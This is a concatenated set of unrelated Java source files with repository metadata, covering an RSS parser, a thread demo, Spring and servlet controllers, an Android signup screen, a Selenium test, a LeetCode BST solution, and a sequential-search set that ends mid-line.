(eventType != XmlPullParser.END_DOCUMENT) { eventType = xmlPullParser.next(); String name = xmlPullParser.getName(); if (name == null) continue; if (eventType == XmlPullParser.END_TAG){ if (name.equalsIgnoreCase("item")) isItem = false; continue; } else if (eventType == XmlPullParser.START_TAG){ if (name.equalsIgnoreCase("item")) { isItem = true; isItemFlag++; if (isItemFlag == 1){ title = null; link = null; description = null; thumbnailUrl = null; } continue; } } String result = ""; if (xmlPullParser.next() == XmlPullParser.TEXT){ result = xmlPullParser.getText(); xmlPullParser.next(); } switch (name){ case "title": title = result; break; case "link": link = result; break; case "description":{ Document doc = Jsoup.parse(result); //doc type Document description = doc.body().text(); Document doc2 = Jsoup.parse(description); description = doc2.body().text(); ImageElement = doc2.select("img").first(); if (ImageElement != null) { thumbnailUrl = ImageElement.attr("src"); } break;} } if (title!=null && link!=null && description!=null){ if (isItem){ RssFeedModel item = new RssFeedModel(title, link, description, thumbnailUrl); itemsList.add(item); } title = null; link = null; description = null; thumbnailUrl = null; } } return itemsList; } finally { inputstream.close(); } } } }
[ "saigon0ngu@gmail.com" ]
saigon0ngu@gmail.com
5db6e0725f3b2482874227fbe70adf5b7393223e
ad7c8e7a92e27f9dcc3847930f0cf0cb3b59388a
/src/basic/ThreadStopTest.java
8bd70881db532eefb1969d4fcb87da3f66bff84e
[]
no_license
jgregor5/m09uf2
58fc29c0c9e4756601a90dc33e0a633bc437991a
bf35558659fce8e484db458f7112e85ffd320c18
refs/heads/master
2020-04-21T07:28:39.432893
2019-06-30T18:21:11
2019-06-30T18:21:11
169,393,795
0
0
null
null
null
null
UTF-8
Java
false
false
1,218
java
package basic; /** * * @author julian */ public class ThreadStopTest { public static void main(String[] args) { MyRunnable myRunnable = new MyRunnable(); Thread thread = new Thread(myRunnable); thread.start(); try { Thread.sleep(10L * 1000L); } catch (InterruptedException ex) { System.out.println("interrupció"); } myRunnable.doStop(); } public static class MyRunnable implements Runnable { private boolean doStop = false; public synchronized void doStop() { this.doStop = true; } private synchronized boolean keepRunning() { return this.doStop == false; } @Override public void run() { while (keepRunning()) { // keep doing what this thread should do. System.out.println("executant"); try { Thread.sleep(3L * 1000L); } catch (InterruptedException ex) { System.out.println("interrupció"); } } } } }
[ "julian@DESKTOP-JFUCUC8" ]
julian@DESKTOP-JFUCUC8
4d5cb01056c5dc639fe7232588272bdd2c671fea
06431a64363aa61cd8fdea3755f3c4a4d37c4a9d
/springboot-redis-curd/src/main/java/net/springboot/examples/ItemController.java
e3ffd1ac258ec566b1aad6d85e7d030f6601ca2f
[ "Apache-2.0" ]
permissive
44010039/springboot-examples
18668d651f5b2f53e72bed82b4f3659b16762c56
e934bc7588d8293b9447cd85df93715191d21831
refs/heads/main
2023-08-18T21:16:27.918070
2021-10-06T13:01:27
2021-10-06T13:01:27
239,403,925
0
0
null
null
null
null
UTF-8
Java
false
false
2,481
java
package net.springboot.examples; import java.util.Map; import org.springframework.http.HttpHeaders; import org.springframework.http.HttpStatus; import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.DeleteMapping; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.PutMapping; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; import org.springframework.web.bind.annotation.RestController; import org.springframework.web.util.UriComponentsBuilder; @RestController public class ItemController { private final ItemRepository itemRepository; public ItemController(ItemRepository itemRepository) { this.itemRepository = itemRepository; } @RequestMapping("/getAllItems") @ResponseBody public ResponseEntity<Map<Integer,Item>> getAllItems(){ Map<Integer,Item> items = itemRepository.getAllItems(); return new ResponseEntity<Map<Integer,Item>>(items, HttpStatus.OK); } @GetMapping("/item/{itemId}") @ResponseBody public ResponseEntity<Item> getItem(@PathVariable int itemId){ Item item = itemRepository.getItem(itemId); return new ResponseEntity<Item>(item, HttpStatus.OK); } @PostMapping(value = "/addItem",consumes = {"application/json"},produces = {"application/json"}) @ResponseBody public ResponseEntity<Item> addItem(@RequestBody Item item, UriComponentsBuilder builder){ itemRepository.addItem(item); HttpHeaders headers = new HttpHeaders(); headers.setLocation(builder.path("/addItem/{id}").buildAndExpand(item.getId()).toUri()); return new ResponseEntity<Item>(headers, HttpStatus.CREATED); } @PutMapping("/updateItem") @ResponseBody public ResponseEntity<Item> updateItem(@RequestBody Item item){ if(item != null){ itemRepository.updateItem(item); } return new ResponseEntity<Item>(item, HttpStatus.OK); } @DeleteMapping("/delete/{id}") @ResponseBody public ResponseEntity<Void> deleteItem(@PathVariable int id){ itemRepository.deleteItem(id); return new ResponseEntity<Void>(HttpStatus.ACCEPTED); } }
[ "wanpinwei@outlook.com" ]
wanpinwei@outlook.com
be5652c9bd4eac21d7e2a00cdeb5ddc96638a292
85da88a376f85fbe2311f58ce9bd91d692947838
/src/m10119002/pbo/latihan60/target/village/Takigakure.java
da27567c458d0d647a1cd1f0b9cd56780c084a69
[]
no_license
m10119002/IF1-10119002-Latihan60-Akatsuki
8f71e3fb947118c45226de2dea5a5a3195aaeea7
79f5eb2ddf5208eb11629024aa70831f86cdbd4d
refs/heads/master
2023-01-19T14:50:10.536952
2020-11-21T22:53:06
2020-11-21T22:53:06
314,918,093
0
0
null
null
null
null
UTF-8
Java
false
false
1,116
java
/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package m10119002.pbo.latihan60.target.village; /** * * @author */ // (2/2) Class Cabang Polymorphism public class Takigakure extends Village { public Takigakure() { // Contoh Override Constructor super("Takigakure", "Hisen, Shibuki, Senji", ""); } // (2/2) Contoh Override Method @Override public void printDesa() { // nama desa - hak akses private System.out.println("Berasal dari ".concat(this.getNamaDesaPanjang())); if(!this.negara.equals("")) System.out.println("dengan sebutan negara ".concat(this.negara). concat(",")); // pemimpin - hak akses protected if(!this.pemimpin.equals("")) System.out.println("yang dipimpin oleh ".concat(this.pemimpin). concat(".")); else System.out.println("."); System.out.println(""); } }
[ "firman.10119002@mahasiswa.unikom.ac.id" ]
firman.10119002@mahasiswa.unikom.ac.id
9d98e03b2c8538352889b4cb5f72937be896b714
a470f1052950f70e3d0e8d4358cbd78511c8b34f
/src/main/java/com/rentcloud/config/ConfigLocalApplication.java
0771e7fc0c01d2c521c9c9fe1d921ddbefd48646
[]
no_license
shabamichael/spring-cloud-config-store
a0233f102f34e51a1a3c9002e16b1f33b2ec7182
84b1f50bb478f7f0c05765d41e8ca279eddd93f7
refs/heads/master
2023-01-31T18:13:27.771918
2020-12-16T17:58:19
2020-12-16T17:58:19
317,163,143
0
0
null
null
null
null
UTF-8
Java
false
false
410
java
package com.rentcloud.config; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.cloud.config.server.EnableConfigServer; @SpringBootApplication @EnableConfigServer public class ConfigLocalApplication { public static void main(String[] args) { SpringApplication.run(ConfigLocalApplication.class, args); } }
[ "shabamichael@outlook.com" ]
shabamichael@outlook.com
4723902ea4215598946c8f9cccff9fa23e013edd
a3862baa8c7bdfc107de2208df567e6ea7e35235
/app/src/main/java/jacky/androidprogram/subpages/Signup.java
f0e749cbd1430939eba1793120871f80e299fb1c
[]
no_license
fcu-d0223470/exit_project
e76e89a45dd603d7a01eb99a005697897f2e22ba
428c5621722430547a630ce5e9afe75c29c8bf5d
refs/heads/master
2021-01-11T13:55:10.878165
2017-06-22T15:58:18
2017-06-22T15:58:18
94,893,553
0
0
null
null
null
null
UTF-8
Java
false
false
11,233
java
package jacky.androidprogram.subpages; import android.app.Activity; import android.app.AlertDialog; import android.content.Context; import android.content.DialogInterface; import android.os.Build; import android.os.Bundle; import android.os.Handler; import android.os.Message; import android.os.Vibrator; import android.provider.Settings; import android.util.Log; import android.view.View; import android.widget.ArrayAdapter; import android.widget.Button; import android.widget.EditText; import android.widget.RadioButton; import android.widget.Spinner; import android.widget.TextView; import android.widget.Toast; import org.apache.http.HttpResponse; import org.apache.http.NameValuePair; import org.apache.http.client.entity.UrlEncodedFormEntity; import org.apache.http.client.methods.HttpPost; import org.apache.http.impl.client.DefaultHttpClient; import org.apache.http.message.BasicNameValuePair; import org.apache.http.protocol.HTTP; import org.apache.http.util.EntityUtils; import java.io.UnsupportedEncodingException; import java.util.ArrayList; import java.util.List; import jacky.androidprogram.Database.DBHandler; import jacky.androidprogram.Database.User; import jacky.androidprogram.R; public class Signup extends Activity implements View.OnClickListener { private EditText tfname; private EditText tlname,tpassword,taccount,tphone,taddr,temail,cpassword; private Spinner mailtype; public TextView view; public String sex,phonesn; private Button sendBtn; DBHandler db; Vibrator vibe; private String uriAPI = "http://www.ebizlearning.com.my/web/phone/user_register.php"; protected static final int REFRESH_DATA = 0x00000001; /** 建立UI Thread使用的Handler,來接收其他Thread來的訊息 */ Handler mHandler = new Handler() { @Override public void handleMessage(Message msg) { switch (msg.what) { // 顯示網路上抓取的資料 case REFRESH_DATA: String result = null; if (msg.obj instanceof String) result = (String) msg.obj; if (result != null) // 印出網路回傳的文字 Toast.makeText(Signup.this, result, Toast.LENGTH_LONG).show(); break; } } }; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_signup); db = new DBHandler(this); vibe = (Vibrator) getSystemService(Context.VIBRATOR_SERVICE); view = (TextView) findViewById(R.id.signview); tfname = (EditText) findViewById(R.id.sfname); tlname = (EditText) findViewById(R.id.slname); tpassword = (EditText) findViewById(R.id.spass); cpassword = (EditText)findViewById(R.id.confirmpass); taccount = (EditText) findViewById(R.id.sacc); tphone = (EditText) findViewById(R.id.sphone); taddr = (EditText) findViewById(R.id.saddr); temail = (EditText)findViewById(R.id.semail); phonesn= Settings.Secure.getString(getApplicationContext().getContentResolver(),Settings .Secure.ANDROID_ID) + Build.SERIAL; sendBtn = (Button) findViewById(R.id.regbtn); addItemsOnSpinner2(); if (sendBtn != null) sendBtn.setOnClickListener(this); } @Override public void onClick(View v) { if (v == sendBtn) { // 擷取文字框上的文字 String fname = tfname.getEditableText().toString(); String lname = tlname.getEditableText().toString(); String password = tpassword.getEditableText().toString(); String account = taccount.getEditableText().toString(); String phone = tphone.getEditableText().toString(); String addr = taddr.getEditableText().toString(); String email = temail.getEditableText().toString(); //String email = temail.getEditableText().toString()+String.valueOf(mailtype.getSelectedItem()); // 啟動一個Thread(執行緒),將要傳送的資料放進Runnable中,讓Thread執行 Thread t = new Thread(new sendPostRunnable(fname,lname,password,account,phone,addr,sex,email,phonesn)); if(account.length()<6)taccount.setError("Account too short"); if(password.length()<6)tpassword.setError("Password too short"); if(phone.isEmpty())tpassword.setError("Please input phone number"); if(addr.isEmpty())tpassword.setError("Please input address"); if(cpassword.getText().toString().equals(tpassword.getText().toString())) { //t.start(); ///* AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(this); // set title alertDialogBuilder.setTitle("Confirmation"); // set dialog message alertDialogBuilder .setMessage("Account will be fix on this phone, Are you sure?") .setCancelable(false) .setPositiveButton("Yes",new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog,int id) { t.start(); dialog.cancel(); } }) .setNegativeButton("No",new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog,int id) { dialog.cancel(); } }); AlertDialog alertDialog = alertDialogBuilder.create(); // show it alertDialog.show(); // */ } else{ cpassword.setError("Password not match."); } } //this.finish(); } private String sendPostDataToInternet(String strTxt,String lname,String password,String account,String phone,String addr,String sex,String email,String phonesn) { /* 建立HTTP Post連線 */ HttpPost httpRequest = new HttpPost(uriAPI); /* * Post運作傳送變數必須用NameValuePair[]陣列儲存 */ List<NameValuePair> params = new ArrayList<NameValuePair>(); params.add(new BasicNameValuePair("fname", strTxt)); params.add(new BasicNameValuePair("lname", lname)); params.add(new BasicNameValuePair("password", password)); params.add(new BasicNameValuePair("account", account)); params.add(new BasicNameValuePair("phone", phone)); params.add(new BasicNameValuePair("sex", sex)); params.add(new BasicNameValuePair("address", addr)); params.add(new BasicNameValuePair("email",email)); params.add(new BasicNameValuePair("phone_number",phonesn)); try { /* 發出HTTP request */ httpRequest.setEntity(new UrlEncodedFormEntity(params, HTTP.UTF_8)); /* 取得HTTP response */ HttpResponse httpResponse = new DefaultHttpClient() .execute(httpRequest); /* 若狀態碼為200 ok */ if (httpResponse.getStatusLine().getStatusCode() == 200) { /* 取出回應字串 */ String strResult = EntityUtils.toString(httpResponse.getEntity()); String succ = "Signup Sucessfully"; boolean found = strResult.contains(succ); int user_id=Integer.parseInt(strResult.substring(20)); String log = strResult+user_id+ "\n"; Log.d("LOG: : ",log); if (found){ log = "found"+ "\n"; Log.d("LOG: : ",log); vibe.vibrate(100); db.createUser(new User(user_id,account,password,strTxt,lname,email,phone,sex,addr,phonesn)); this.finish(); return succ; } else { log = "fail"+ "\n"; Log.d("LOG: : ",log); return strResult;} } } catch (Exception e) { e.printStackTrace(); } return null; } class sendPostRunnable implements Runnable { String strTxt = null; String lname = null; String password = null; String account = null; String phone = null; String addr = null; String sex = null; String email = null; String phonesn=null; // 建構子,設定要傳的字串 public sendPostRunnable(String strTxt, String lname, String password, String account, String phone, String addr, String sex,String email,String phonesn) { this.strTxt = strTxt; this.lname = lname; this.password = password; this.account = account; this.phone = phone; this.addr = addr; this.sex = sex; this.email=email; this.phonesn=phonesn; } @Override public void run() { String result = sendPostDataToInternet(strTxt,lname,password,account,phone,addr,sex,email,phonesn); mHandler.obtainMessage(REFRESH_DATA, result).sendToTarget(); } } public void onRadioButtonClicked(View view) throws UnsupportedEncodingException { // Is the button now checked? boolean checked = ((RadioButton) view).isChecked(); // Check which radio button was clicked switch(view.getId()) { case R.id.maler: if (checked) sex=getResources().getString(R.string.male); break; case R.id.femaler: if (checked) sex=getResources().getString(R.string.female); break; } } public void addItemsOnSpinner2() { mailtype = (Spinner) findViewById(R.id.mailtype); /*List<String> list = new ArrayList<String>(); list.add("@gmail.com"); list.add("@hotmail.com"); list.add("@yahoo.com"); ArrayAdapter<String> dataAdapter = new ArrayAdapter<String>(this, android.R.layout.simple_spinner_item, list); dataAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item); mailtype.setAdapter(dataAdapter); */ String[] plants = new String[]{ "@gmail.com", "@hotmail.com", "@yahoo.com" }; // Initializing an ArrayAdapter ArrayAdapter<String> spinnerArrayAdapter = new ArrayAdapter<String>( this,R.layout.spinner_item,plants ); spinnerArrayAdapter.setDropDownViewResource(R.layout.spinner_item); mailtype.setAdapter(spinnerArrayAdapter); } }
[ "jackykokzk@gmail.com" ]
jackykokzk@gmail.com
d76707fc6585079ab9dd248d500dc53054de04d6
3e233bdfef336bac9953723a0b9f0388a3cfb2fc
/src/com/exercise/web/ServletShowShoppingcart.java
e29c3d4ce2122b3a87c9ebd3caa09fdbcb957d45
[]
no_license
naunchazy/onlineshop
df945d6ff236d8b0283226ffee1d9fff079fb3e3
8b1c4b80b87232cc74ee11267a745d48d26a5f1f
refs/heads/master
2021-05-14T11:40:21.659205
2018-01-05T13:40:50
2018-01-05T13:40:50
116,388,542
0
0
null
null
null
null
GB18030
Java
false
false
1,449
java
package com.exercise.web; import java.io.IOException; import java.sql.SQLException; import java.util.List; import java.util.Map; import java.util.Set; import javax.servlet.ServletException; import javax.servlet.http.Cookie; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import com.exercise.domain.Product; import com.exercise.domain.User; import com.exercise.service.ProductService; public class ServletShowShoppingcart extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { HttpSession session = request.getSession(); String message = null; Map<Product, Integer> myCart = (Map<Product, Integer>) session.getAttribute("myCart"); /*if(myCart==null||"".equals(myCart)){*/ if(myCart==null||myCart.size()==0){ message = "您还未添加任何商品!"; } int size=0; if(myCart!=null){ for (Product p : myCart.keySet()) { size+=myCart.get(p); } } session.setAttribute("size", size); request.setAttribute("message", message); request.getRequestDispatcher("/showShoppingcart.jsp").forward(request, response); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } }
[ "1476276902@qq.com" ]
1476276902@qq.com
bed123ad4048c8590928b1b54a69a23ed66219ec
a1826c2ed9c12cfc395fb1a14c1a2e1f097155cb
/emas-devops-20191204/src/main/java/com/aliyun/emas_devops20191204/models/TriggerPipelineShrinkRequest.java
6107d3adcddb896f446bb39cdcb5ed65040b6dba
[ "Apache-2.0" ]
permissive
aliyun/alibabacloud-java-sdk
83a6036a33c7278bca6f1bafccb0180940d58b0b
008923f156adf2e4f4785a0419f60640273854ec
refs/heads/master
2023-09-01T04:10:33.640756
2023-09-01T02:40:45
2023-09-01T02:40:45
288,968,318
40
45
null
2023-06-13T02:47:13
2020-08-20T09:51:08
Java
UTF-8
Java
false
false
1,120
java
// This file is auto-generated, don't edit it. Thanks. package com.aliyun.emas_devops20191204.models; import com.aliyun.tea.*; public class TriggerPipelineShrinkRequest extends TeaModel { @NameInMap("PipelineId") @Validation(required = true) public String pipelineId; @NameInMap("RuntimeEnvVariables") public String runtimeEnvVariablesShrink; public static TriggerPipelineShrinkRequest build(java.util.Map<String, ?> map) throws Exception { TriggerPipelineShrinkRequest self = new TriggerPipelineShrinkRequest(); return TeaModel.build(map, self); } public TriggerPipelineShrinkRequest setPipelineId(String pipelineId) { this.pipelineId = pipelineId; return this; } public String getPipelineId() { return this.pipelineId; } public TriggerPipelineShrinkRequest setRuntimeEnvVariablesShrink(String runtimeEnvVariablesShrink) { this.runtimeEnvVariablesShrink = runtimeEnvVariablesShrink; return this; } public String getRuntimeEnvVariablesShrink() { return this.runtimeEnvVariablesShrink; } }
[ "sdk-team@alibabacloud.com" ]
sdk-team@alibabacloud.com
570e9b070e65743f75bfab5ef7f03a39c0e17b67
c20234a8072962eb5c272412e55ac90525c7e3b3
/2021/2_February/Week_1/Day2_TrimaBinarySearchTree.java
cdf22eebc238aa2113ec5321fa7e9dd34af176ce
[]
no_license
Nedhro/Java
6b01bc96b0bb18e949e8f0ebd207b07fcdcf5507
d15b220bfcd7604be645c498d6c50c8c8a9d5453
refs/heads/main
2023-06-29T02:44:32.274868
2021-07-31T18:23:04
2021-07-31T18:23:04
null
0
0
null
null
null
null
UTF-8
Java
false
false
2,031
java
//Day 2: //Problem Statement: Trim a Binary Search Tree // Given the root of a binary search tree and the lowest and highest boundaries as low and high, trim the tree so that all its elements lies in [low, high]. Trimming the tree should not change the relative structure of the elements that will remain in the tree (i.e., any node's descendant should remain a descendant). It can be proven that there is a unique answer. // Return the root of the trimmed binary search tree. Note that the root may change depending on the given bounds. // Example 1: // Input: root = [1,0,2], low = 1, high = 2 // Output: [1,null,2] // Example 2: // Input: root = [3,0,4,null,2,null,null,1], low = 1, high = 3 // Output: [3,2,null,1] // Example 3: // Input: root = [1], low = 1, high = 2 // Output: [1] // Example 4: // Input: root = [1,null,2], low = 1, high = 3 // Output: [1,null,2] // Example 5: // Input: root = [1,null,2], low = 2, high = 4 // Output: [2] // Constraints: // The number of nodes in the tree in the range [1, 104]. // 0 <= Node.val <= 104 // The value of each node in the tree is unique. // root is guaranteed to be a valid binary search tree. // 0 <= low <= high <= 104 //Solution: /** * Definition for a binary tree node. * public class TreeNode { * int val; * TreeNode left; * TreeNode right; * TreeNode() {} * TreeNode(int val) { this.val = val; } * TreeNode(int val, TreeNode left, TreeNode right) { * this.val = val; * this.left = left; * this.right = right; * } * } */ class Solution { public TreeNode trimBST(TreeNode root, int low, int high) { if(root==null) return root; if(root.val>high) return trimBST(root.left, low, high); if(root.val<low) return trimBST(root.right, low, high); root.left=trimBST(root.left, low, high); root.right=trimBST(root.right, low, high); return root; } } //Complexity: O(log*n)
[ "v.anushka786@gmail.com" ]
v.anushka786@gmail.com
ade95d50f4dd8f5d37b65dbf35faa130750c37f9
f0b9b4829812a68b0f02b5ef1e560b65cef4e3ca
/src/kiloboltgame/Background.java
def6bd4f7120e817a8fde28d79158a93949a995a
[ "Apache-2.0" ]
permissive
jonathanody/KiloboltGame
4a4c9c43f1beeccc8e73cf45e06f9f5e6a50b633
de65363b514b33c863e1366dbaa774f609bb2b31
refs/heads/master
2016-09-14T09:34:15.069356
2016-05-22T12:59:04
2016-05-22T12:59:04
58,280,866
0
0
null
null
null
null
UTF-8
Java
false
false
553
java
package kiloboltgame; public class Background { private int bgX, bgY, speedX; public Background(int x, int y) { bgX = x; bgY = y; speedX = 0; } public void update() { bgX += speedX; if (bgX <= -2160) { bgX += 4320; } } public int getBgX() { return bgX; } public int getBgY() { return bgY; } public int getSpeedX() { return speedX; } public void setBgX(int bgX) { this.bgX = bgX; } public void setBgY(int bgY) { this.bgY = bgY; } public void setSpeedX(int speedX) { this.speedX = speedX; } }
[ "jonathanody@users.noreply.github.com" ]
jonathanody@users.noreply.github.com
e24a57ab4def4c8faea4617fc5086e9e0b97feac
86b2ce8eeee9799fa4358616d85d2f44eee0c3e0
/testuebung/PhotoStore/src/main/java/entity/Store.java
245b5a388ab364dc14f0dead61d75c9dd6385d56
[]
no_license
jakobhanner/GITschule5ahitm
b88a4e95fe9e09f64663edbd7af7da4bf9b2fd30
f9b939a373f88ecb6fc2f532fba26be46bf40010
refs/heads/master
2021-09-06T14:12:26.996718
2018-02-07T10:39:55
2018-02-07T10:39:55
113,782,159
0
0
null
null
null
null
UTF-8
Java
false
false
1,893
java
/* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ package entity; import java.util.ArrayList; import java.util.List; import javax.persistence.CascadeType; import javax.persistence.Entity; import javax.persistence.FetchType; import javax.persistence.GeneratedValue; import javax.persistence.GenerationType; import javax.persistence.Id; import javax.persistence.ManyToOne; import javax.persistence.NamedQueries; import javax.persistence.NamedQuery; import javax.persistence.OneToMany; /** * * @author Jakob Hanner */ @Entity @NamedQueries({ @NamedQuery(name = "Store.findById", query = "SELECT s FROM Store s WHERE s.storeId = :storeId") }) public class Store { @Id @GeneratedValue(strategy = GenerationType.AUTO) private int storeId; private String location; private int employee; @OneToMany(fetch = FetchType.EAGER, cascade = CascadeType.ALL) List<Brand> brands = new ArrayList<>(); public Store() { } public Store(String location, int employee) { this.location = location; this.employee = employee; } public String getLocation() { return location; } public void setLocation(String location) { this.location = location; } public int getEmployee() { return employee; } public void setEmployee(int employee) { this.employee = employee; } public int getStoreId() { return storeId; } public void setStoreId(int storeId) { this.storeId = storeId; } public void addBrand(Brand brand) { this.brands.add(brand); } public List<Brand> getBrands() { return brands; } public void setBrands(List<Brand> brands) { this.brands = brands; } }
[ "jakob.hanner@gmx.at" ]
jakob.hanner@gmx.at
d44e197d3f171680e7b0bd9c0d85d0ee2e3d1db5
cd472fc0290ba59aeb797ec2f453e4b4b092ca92
/Selenium_Advanced/src/com/test/SeleniumTest.java
0f8f49628ee7008f775e2c519ffd8fde4f37c8b5
[]
no_license
SajjadAL/SeleniumAdavance
ce906c6848271e52f1e898f6137204deb99a7990
0f134ae058b079bdb42945caa30cb53af9a83c8b
refs/heads/master
2020-03-18T09:30:20.424067
2018-05-23T12:26:54
2018-05-23T12:26:54
134,566,443
0
0
null
null
null
null
UTF-8
Java
false
false
2,122
java
package com.test; import org.openqa.selenium.By; import org.openqa.selenium.WebDriver; import org.openqa.selenium.WebElement; import org.openqa.selenium.chrome.ChromeDriver; import org.openqa.selenium.support.ui.Select; public class SeleniumTest { public static void main(String[] args) { System.out.println("Hello Selenium"); //Register a user on mercurytour site System.setProperty("webdriver.chrome.driver", "C:\\Sajjad\\Selenium\\chromedriver_win32\\chromedriver.exe"); //Launch a browser ChromeDriver driver=new ChromeDriver(); //navigate to site driver.get("http://newtours.demoaut.com/"); //registerUser(driver); login(driver); } public static void login(WebDriver driver) { driver.findElement(By.name("userName")).sendKeys("selenium"); driver.findElement(By.name("password")).sendKeys("selenium"); driver.findElement(By.name("login")).click(); } public static void registerUser(WebDriver driver) { //Click on Register Link //driver.findElement(By.xpath(".//a[text()='REGISTER']")).click(); //driver.findElement(By.linkText("REGISTER")).click(); driver.findElement(By.partialLinkText("REGISTER")).click(); CharSequence name=new String("XYZ"); //Type First Name driver.findElement(By.name("firstName")).sendKeys(name); driver.findElement(By.xpath(".//input[@name='city']")).sendKeys("Hyd"); WebElement country=driver.findElement(By.name("country")); Select select=new Select(country); select.selectByVisibleText("INDIA"); driver.findElement(By.id("email")).sendKeys("selenium"); driver.findElement(By.name("password")).sendKeys("selenium"); driver.findElement(By.name("confirmPassword")).sendKeys("selenium"); driver.findElement(By.name("register")).click(); String text=driver.findElement(By.partialLinkText("Note: Your user name is")).getText(); System.out.println(text); if(text.contains("selenium")) { System.out.println("Selenium user got created"); }else { System.out.println("Some error occured in user registration"); } } }
[ "langoti@ARBGFP2RF4.asiapacific.hpqcorp.net" ]
langoti@ARBGFP2RF4.asiapacific.hpqcorp.net
7f0321c292e18bfc703aa165826c2d90bd6427f5
685f1478bc672cfba1470f43e6617432c9fcae8c
/gulimall-product/src/main/java/com/atguigu/gulimall/product/service/BrandService.java
db35150f5e25fdd97bc001ddd8f765e975a940df
[]
no_license
dyatsen/gulimall
345ae782ee75c50b2fbe034696ac9f9695bc9d30
08d73f61a4b9e7a591dd280f5ef594426ae30da9
refs/heads/main
2023-05-01T09:37:30.408871
2021-05-13T09:51:20
2021-05-13T09:51:20
365,905,744
0
0
null
null
null
null
UTF-8
Java
false
false
444
java
package com.atguigu.gulimall.product.service; import com.baomidou.mybatisplus.extension.service.IService; import com.atguigu.common.utils.PageUtils; import com.atguigu.gulimall.product.entity.BrandEntity; import java.util.Map; /** * 品牌 * * @author dengys * @email 705501518@qq.com * @date 2021-05-11 08:55:35 */ public interface BrandService extends IService<BrandEntity> { PageUtils queryPage(Map<String, Object> params); }
[ "705501518@qq.com" ]
705501518@qq.com
d9d848420e591f139af2cae536c9529f3fed9ba7
c95b2512abfd6bb04491ea41bf47844868fa4244
/Algorithms4ed/src/st/SequentialSearchSET.java
6fffc8d2cb1adc88372cf7c68047d6c05e5e31ff
[]
no_license
zalacer/projects-tn
bf318562cbda745affac9cbd7ad9d24b867468f0
08108c8d5c2e9581651cb7291fd7ed29b7a32eea
refs/heads/master
2020-05-21T22:16:05.797533
2018-07-18T18:13:15
2018-07-18T18:13:15
29,801,935
3
0
null
null
null
null
UTF-8
Java
false
false
4,753
java
package st; import static v.ArrayUtils.*; import java.util.Iterator; import ds.Stack; // based on st.SequentialSearchSTX for ex3502 public class SequentialSearchSET<X> implements UnorderedSET<X> { private int n = 0; // number of keys private Node first; // the linked list of key-value pairs private Class<?> xclass = null; // class of X private class Node { private X x; private Node next; public Node(X x, Node next) { this.x = x; this.next = next; } } public SequentialSearchSET(){} public SequentialSearchSET(X[] xa) { if (xa == null || xa.length == 0) return; xclass = xa.getClass().getComponentType(); int n = xa.length; int c = 0; X[] ta = ofDim(xa.getClass().getComponentType(), n); for (int i = 0; i < n; i++) if (xa[c] != null) ta[c] = xa[c]; if (c == 0) return; ta = take(ta,c); n = ta.length; for (int i = 0; i < n; i++) add(ta[i]); } public int size() { return n; } public boolean isEmpty() { return size() == 0; } public boolean contains(X x) { if (x == null) throw new NullPointerException("argument to contains() is null"); return get(x); } private boolean get(X x) { if (x == null) throw new NullPointerException("argument to get() is null"); for (Node node = first; node != null; node = node.next) if (x.equals(node.x)) return true; return false; } public void add(X x) { if (x == null) throw new NullPointerException("add: argument is null"); if (xclass == null) xclass = x.getClass(); for (Node node = first; node != null; node = node.next) if (x.equals(node.x)) return; first = new Node(x,first); n++; } public void delete(X x) { if (x == null) throw new NullPointerException("delete: argument is null"); if (first == null) return; if (first.x.equals(x)) { first = first.next; n--; return; } Node node = first, p; while (node.next != null) { p = node; node = node.next; if (x.equals(node.x)) { p.next = node.next; n--; node = null; return; } } } public Iterator<X> iterator() { Stack<X> stack = new Stack<X>(); for (Node node = first; node != null; node = node.next) stack.push(node.x); return stack.iterator(); } public SequentialSearchSET<X> union(SequentialSearchSET<X> that) { if (that == null) return null; SequentialSearchSET<X> set = new SequentialSearchSET<>(); for (X x : this) { set.add(x); } for (X x : that) { set.add(x); } return set; } public SequentialSearchSET<X> intersection(SequentialSearchSET<X> that) { if (that == null) return null; SequentialSearchSET<X> set = new SequentialSearchSET<>(); if (this.size() < that.size()) { for (X x : this) { if (that.contains(x)) set.add(x); } } else for (X x : that) { if (this.contains(x)) set.add(x); } return set; } @Override public int hashCode() { int h = 0; Iterator<X> it = iterator(); while (it.hasNext()) { X x = it.next(); h += x == null ? 0 : x.hashCode(); } return h; } @SuppressWarnings({ "rawtypes", "unchecked" }) @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; SequentialSearchSET other = (SequentialSearchSET) obj; if (size() != other.size()) return false; Iterator<X> it = iterator(); while (it.hasNext()) if (!other.contains(it.next())) return false; return true; } @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("("); Iterator<X> it = iterator(); while (it.hasNext()) sb.append(it.next()+","); sb.replace(sb.length()-1, sb.length(),")"); return sb.toString(); } public static void main(String[] args) { System.out.println("SequentialSearchSET demo:"); SequentialSearchSET<Integer> set1 = new SequentialSearchSET<>(); for (int i = 1; i < 11; i++) for (int j = 0; j < i; j++) set1.add(i); System.out.println("set1 = "+set1); SequentialSearchSET<Integer> set2 = new SequentialSearchSET<>(); for (int i = 6; i < 16; i++) for (int j = 0; j < i; j++) set2.add(i); System.out.println("set2 = "+set2); SequentialSearchSET<Integer> union1 = set1.union(set2); System.out.println("set1 union set2 = "+union1); for (int i = 1; i < 16; i++) assert union1.contains(i); SequentialSearchSET<Integer> intersection1 = 